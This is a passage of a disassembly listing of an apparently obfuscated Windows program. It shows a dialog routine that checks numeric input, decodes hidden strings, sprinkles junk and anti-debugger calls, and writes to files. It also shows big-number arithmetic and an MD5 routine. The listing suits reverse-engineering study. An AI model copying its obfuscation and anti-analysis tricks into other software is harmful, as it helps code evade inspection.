loc_40B675: ; CODE XREF: sub_40B3E8+283�j
push 1010B0h ; color
push [ebp+wParam] ; hdc
call SetTextColor ; SetTextColor
jmp short loc_40B68E
; ---------------------------------------------------------------------------
loc_40B684: ; CODE XREF: sub_40B3E8+28B�j
push 0 ; color
push [ebp+wParam] ; hdc
call SetTextColor ; SetTextColor
loc_40B68E: ; CODE XREF: sub_40B3E8+29A�j
mov word ptr [ebp+lpText], 64CAh
movzx eax, word ptr [ebp+lpText]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+lpText], ax
push 0FFFFFFh ; color
push [ebp+wParam] ; hdc
call SetBkColor ; SetBkColor
mov byte ptr [ebp+var_23C+3], 5Dh
sub byte ptr [ebp+var_23C+3], 0FBh
and [ebp+plbrush.lbStyle], 0
and [ebp+plbrush.lbColor], 0
lea eax, [ebp+plbrush]
push eax ; plbrush
call CreateBrushIndirect ; CreateBrushIndirect
mov [ebp+hWnd], eax
lea edi, [ebp-248h]
lea esi, byte_446A8D
movsd
movsd
mov eax, [ebp+hWnd]
jmp loc_40BC22
; ---------------------------------------------------------------------------
call GetLastError
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B709: ; CODE XREF: sub_40B3E8+35�j
lea edi, [ebp+var_11A]
lea esi, aGjvry ; "gjVRy"
mov ecx, 3
rep movsw
push 2 ; Size
push offset word_446B52 ; Src
call sub_40129C
push offset Format
push eax ; Format
lea edi, [ebp+Buffer]
push edi ; Dest
call sprintf ; sprintf
add esp, 14h
call GetProcessHeap ; GetProcessHeap
push 0FFh ; nMaxCount
lea eax, [ebp+String]
push eax ; lpString
push dword_432DC0 ; hWnd
call GetWindowTextA ; GetWindowTextA
call GetCurrentProcessId ; GetCurrentProcessId
cmp [ebp+String], 0
jnz short loc_40B79D
call IsDebuggerPresent ; IsDebuggerPresent
push 1Fh ; Size
push offset word_446B32 ; Src
call sub_40129C
add esp, 8
push 0 ; uType
push 0 ; lpCaption
push eax ; lpText
push 0 ; hWnd
call MessageBoxA ; MessageBoxA
push dword_432DC0 ; hWnd
call SetFocus ; SetFocus
call GetProcessHeap ; GetProcessHeap
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B79D: ; CODE XREF: sub_40B3E8+37E�j
push 5 ; Size
push offset dword_446B2C ; Src
call sub_40129C
lea edi, [ebp+String]
push edi
lea edi, [ebp+Buffer]
push edi
push eax ; Format
lea edi, [ebp+Buffer]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
push 0FFh ; nMaxCount
lea eax, [ebp+String]
push eax ; lpString
push dword_41E8C4 ; hWnd
call GetWindowTextA ; GetWindowTextA
cmp [ebp+String], 0
jnz short loc_40B822
call GetTickCount ; GetTickCount
push 1Eh ; Size
push offset byte_446B0D ; Src
call sub_40129C
add esp, 8
push 0 ; uType
push 0 ; lpCaption
push eax ; lpText
push 0 ; hWnd
call MessageBoxA ; MessageBoxA
mov eax, dword_446A9B
mov [ebp+lpText], eax
push dword_41E8C4 ; hWnd
call SetFocus ; SetFocus
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B822: ; CODE XREF: sub_40B3E8+3FD�j
push 5 ; Size
push offset byte_446B07 ; Src
call sub_40129C
lea edi, [ebp+String]
push edi
lea edi, [ebp+Buffer]
push edi
push eax ; Format
lea edi, [ebp+Buffer]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
call GetVersion ; GetVersion
push 0FFh ; nMaxCount
lea eax, [ebp+String]
push eax ; lpString
push dword_41E8BC ; hWnd
call GetWindowTextA ; GetWindowTextA
lea edi, [ebp+var_11D]
lea esi, byte_446A9F
mov ecx, 3
rep movsb
cmp [ebp+String], 0
jz loc_40B9B8
mov [ebp+var_10C], 53E8h
add [ebp+var_10C], 3B86h
lea ecx, [ebp+String]
or eax, 0FFFFFFFFh
loc_40B8A5: ; CODE XREF: sub_40B3E8+4C2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B8A5
cmp eax, 4
jb loc_40B9B8
call GetLastError
mov [ebp+var_102], 0
jmp short loc_40B8E5
; ---------------------------------------------------------------------------
loc_40B8C3: ; CODE XREF: sub_40B3E8+516�j
movzx eax, [ebp+var_102]
mov al, [ebp+eax+String]
cmp al, 30h
jl short loc_40B8D9
cmp al, 39h
jle short loc_40B8DE
loc_40B8D9: ; CODE XREF: sub_40B3E8+4EB�j
jmp loc_40B9B8
; ---------------------------------------------------------------------------
loc_40B8DE: ; CODE XREF: sub_40B3E8+4EF�j
add [ebp+var_102], 1
loc_40B8E5: ; CODE XREF: sub_40B3E8+4D9�j
lea ecx, [ebp+String]
or eax, 0FFFFFFFFh
loc_40B8EE: ; CODE XREF: sub_40B3E8+50B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B8EE
movzx esi, [ebp+var_102]
cmp esi, eax
jb short loc_40B8C3
call GetProcessHeap ; GetProcessHeap
mov [ebp+var_101], 0
jmp loc_40B997
; ---------------------------------------------------------------------------
loc_40B911: ; CODE XREF: sub_40B3E8+5C8�j
mov byte ptr [ebp+lpText+2], 0EEh
sub byte ptr [ebp+lpText+2], 96h
call GetLastError
mov al, [ebp+var_101]
mov byte ptr [ebp+lpText+3], al
jmp short loc_40B95B
; ---------------------------------------------------------------------------
loc_40B932: ; CODE XREF: sub_40B3E8+58C�j
movzx eax, byte ptr [ebp+lpText+3]
movsx eax, [ebp+eax+String]
movzx edx, [ebp+var_101]
movsx edx, [ebp+edx+String]
cmp eax, edx
jnz short loc_40B976
add byte ptr [ebp+lpText+3], 1
loc_40B95B: ; CODE XREF: sub_40B3E8+548�j
lea ecx, [ebp+String]
or eax, 0FFFFFFFFh
loc_40B964: ; CODE XREF: sub_40B3E8+581�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B964
movzx esi, byte ptr [ebp+lpText+3]
cmp esi, eax
jb short loc_40B932
loc_40B976: ; CODE XREF: sub_40B3E8+56A�j
call GetCurrentProcessId ; GetCurrentProcessId
movzx eax, byte ptr [ebp+lpText+3]
movzx edx, [ebp+var_101]
sub eax, edx
cmp eax, 3
jg short loc_40B9B8
add [ebp+var_101], 1
loc_40B997: ; CODE XREF: sub_40B3E8+524�j
lea ecx, [ebp+String]
or eax, 0FFFFFFFFh
loc_40B9A0: ; CODE XREF: sub_40B3E8+5BD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B9A0
movzx esi, [ebp+var_101]
cmp esi, eax
jb loc_40B911
jmp short loc_40BA1F
; ---------------------------------------------------------------------------
loc_40B9B8: ; CODE XREF: sub_40B3E8+49A�j
; sub_40B3E8+4C7�j ...
mov eax, dword_43C094
add eax, 7CBh
push eax ; Duration
call _sleep ; _sleep
call GetCurrentThreadId ; GetCurrentThreadId
push 35h ; Size
push offset byte_446AD1 ; Src
call sub_40129C
mov [ebp+lpText], eax
push 13h ; Size
push offset byte_446ABD ; Src
call sub_40129C
add esp, 14h
push 0 ; uType
push eax ; lpCaption
mov edi, [ebp+lpText]
push edi ; lpText
push 0 ; hWnd
call MessageBoxA ; MessageBoxA
call GetTickCount ; GetTickCount
push dword_41E8BC ; hWnd
call SetFocus ; SetFocus
mov eax, dword_446AA2
mov [ebp+var_121], eax
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40BA1F: ; CODE XREF: sub_40B3E8+5CE�j
push 5 ; Size
push offset dword_446B2C ; Src
call sub_40129C
lea edi, [ebp+String]
push edi
lea edi, [ebp+Buffer]
push edi
push eax ; Format
lea edi, [ebp+Buffer]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
call GetCurrentProcessId ; GetCurrentProcessId
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
push offset byte_41FA00 ; lpFileName
call CreateFileA ; CreateFileA
mov [ebp+hObject], eax
lea edi, [ebp+var_124]
lea esi, word_446AA6
mov ecx, 3
rep movsb
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
push [ebp+hObject] ; hFile
call SetFilePointer ; SetFilePointer
call GetTickCount ; GetTickCount
lea ecx, [ebp+Buffer]
or eax, 0FFFFFFFFh
loc_40BA9F: ; CODE XREF: sub_40B3E8+6BC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40BA9F
push 0 ; lpOverlapped
lea esi, [ebp+NumberOfBytesWritten]
push esi ; lpNumberOfBytesWritten
push eax ; nNumberOfBytesToWrite
lea edi, [ebp+Buffer]
push edi ; lpBuffer
push [ebp+hObject] ; hFile
call WriteFile ; WriteFile
mov [ebp+var_103], 87h
movzx eax, [ebp+var_103]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_103], al
push 2 ; Size
push offset word_446ABA ; Src
call sub_40129C
add esp, 8
push 0 ; lpOverlapped
lea edi, [ebp+NumberOfBytesWritten]
push edi ; lpNumberOfBytesWritten
mov edi, 14h
sub edi, dword_43C098
push edi ; nNumberOfBytesToWrite
push eax ; lpBuffer
push [ebp+hObject] ; hFile
call WriteFile ; WriteFile
mov ax, word_446AA9
mov [ebp+var_126], ax
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
call GetCurrentThreadId ; GetCurrentThreadId
push hWndParent ; hWnd
call DestroyWindow ; DestroyWindow
call IsDebuggerPresent ; IsDebuggerPresent
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
push offset FileName ; lpFileName
call CreateFileA ; CreateFileA
mov [ebp+hObject], eax
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
push [ebp+hObject] ; hFile
call SetFilePointer ; SetFilePointer
call GetVersion ; GetVersion
lea ecx, Format
or eax, 0FFFFFFFFh
loc_40BB77: ; CODE XREF: sub_40B3E8+794�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40BB77
mov edi, eax
push 0 ; lpOverlapped
lea esi, [ebp+NumberOfBytesWritten]
push esi ; lpNumberOfBytesWritten
push edi ; nNumberOfBytesToWrite
push offset Format ; lpBuffer
push [ebp+hObject] ; hFile
call WriteFile ; WriteFile
lea edi, [ebp+var_12B]
lea esi, byte_446AAB
mov ecx, 5
rep movsb
push 1 ; Size
push offset byte_446AB8 ; Src
call sub_40129C
add esp, 8
push 0 ; lpOverlapped
lea edi, [ebp+NumberOfBytesWritten]
push edi ; lpNumberOfBytesWritten
mov edi, 13h
sub edi, dword_43C098
push edi ; nNumberOfBytesToWrite
push eax ; lpBuffer
push [ebp+hObject] ; hFile
call WriteFile ; WriteFile
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
push 5 ; nCmdShow
push hWnd ; hWnd
call ShowWindow ; ShowWindow
lea edi, [ebp+var_130]
lea esi, dword_446AB0
mov ecx, 5
rep movsb
jmp short loc_40BC22
; ---------------------------------------------------------------------------
loc_40BC0A: ; CODE XREF: sub_40B3E8+2B�j
; sub_40B3E8+47�j ...
push [ebp+lParam] ; lParam
push [ebp+wParam] ; wParam
push [ebp+Msg] ; Msg
push [ebp+arg_0] ; hWnd
call DefWindowProcA ; DefWindowProcA
jmp short loc_40BC22
; ---------------------------------------------------------------------------
call GetTickCount ; GetTickCount
loc_40BC22: ; CODE XREF: sub_40B3E8+19A�j
; sub_40B3E8+1E1�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40B3E8 endp
; ---------------------------------------------------------------------------
align 4
; [00000006 BYTES: COLLAPSED FUNCTION SysAllocString. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION FindFirstUrlCacheEntryA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION FindNextUrlCacheEntryA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION CoCreateInstance. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION CLSIDFromString. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION CoInitialize. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION CoUninitialize. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC80 proc near ; CODE XREF: sub_408741+20�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_447B7C
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_40BD4B
xor edx, edx
loc_40BCB0: ; CODE XREF: sub_40BC80+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_40BCC2
mov edx, [ebp+arg_4]
call sub_40BCDC
loc_40BCC2: ; CODE XREF: sub_40BC80+38�j
lea edx, dword_447B7C
call sub_40BCDC
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_40BCB0
popa
pop ebp
retn 10h
sub_40BC80 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40BCDC proc near ; CODE XREF: sub_40BC80+3D�p
; sub_40BC80+48�p
lea edi, dword_447B3C
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_447B7C
call sub_40BD4B
loc_40BCF6: ; CODE XREF: sub_40BCDC+5D�j
lea edi, dword_447B3C
mov ecx, 10h
xor eax, eax
loc_40BD03: ; CODE XREF: sub_40BCDC+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_40BD03
call sub_40BD5C
bt dword_447B7C, ebx
jnb short loc_40BD38
mov esi, edx
lea edi, dword_447B3C
xor eax, eax
mov ecx, 10h
loc_40BD27: ; CODE XREF: sub_40BCDC+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BD27
call sub_40BD5C
loc_40BD38: ; CODE XREF: sub_40BCDC+3A�j
dec ebx
jns short loc_40BCF6
mov edi, edx
lea esi, dword_447B3C
mov ecx, 10h
rep movsd
retn
sub_40BCDC endp
; =============== S U B R O U T I N E =======================================
sub_40BD4B proc near ; CODE XREF: sub_40BC80+29�p
; sub_40BCDC+15�p
mov ebx, 1FFh
loc_40BD50: ; CODE XREF: sub_40BD4B+B�j
bt [edi], ebx
jb short locret_40BD58
dec ebx
jnz short loc_40BD50
locret_40BD58: ; CODE XREF: sub_40BD4B+8�j
retn
sub_40BD4B endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40BD5C proc near ; CODE XREF: sub_40BCDC+2E�p
; sub_40BCDC+57�p
lea esi, dword_447B3C
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_40BD6A: ; CODE XREF: sub_40BD5C+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_40BD93
ja short loc_40BD77
dec ecx
jns short loc_40BD6A
loc_40BD77: ; CODE XREF: sub_40BD5C+16�j
mov esi, [ebp+14h]
lea edi, dword_447B3C
xor eax, eax
mov ecx, 10h
loc_40BD87: ; CODE XREF: sub_40BD5C+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BD87
locret_40BD93: ; CODE XREF: sub_40BD5C+14�j
retn
sub_40BD5C endp
; =============== S U B R O U T I N E =======================================
sub_40BD94 proc near ; CODE XREF: sub_40BDE5+32�p
; sub_40BDE5+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_40BD94 endp
; =============== S U B R O U T I N E =======================================
sub_40BDA1 proc near ; CODE XREF: sub_40BDE5+219�p
; sub_40BDE5+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_40BDA1 endp
; =============== S U B R O U T I N E =======================================
sub_40BDAE proc near ; CODE XREF: sub_40BDE5+420�p
; sub_40BDE5+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_40BDAE endp
; =============== S U B R O U T I N E =======================================
sub_40BDB5 proc near ; CODE XREF: sub_40BDE5+627�p
; sub_40BDE5+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_40BDB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BDBE proc near ; CODE XREF: sub_408779+A8�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_40BDBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BDE5 proc near ; CODE XREF: sub_408779+C5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_447BBC, eax
mov eax, [edi+4]
mov dword_447BC0, eax
mov eax, [edi+8]
mov dword_447BC4, eax
mov eax, [edi+0Ch]
mov dword_447BC8, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BD94
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BD94
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BD94
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BD94
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BD94
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BD94
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BD94
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BD94
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BD94
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BD94
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BD94
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BD94
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BD94
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BD94
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BD94
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDA1
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDA1
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDA1
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDA1
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDA1
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDA1
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDA1
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDA1
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDA1
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDA1
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDA1
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDA1
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDA1
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDA1
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDA1
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDA1
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDAE
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDAE
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDAE
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDAE
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDAE
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDAE
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDAE
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDAE
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDAE
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDAE
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDAE
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDAE
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDAE
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDAE
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDAE
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDAE
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDB5
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDB5
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDB5
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDB5
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDB5
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
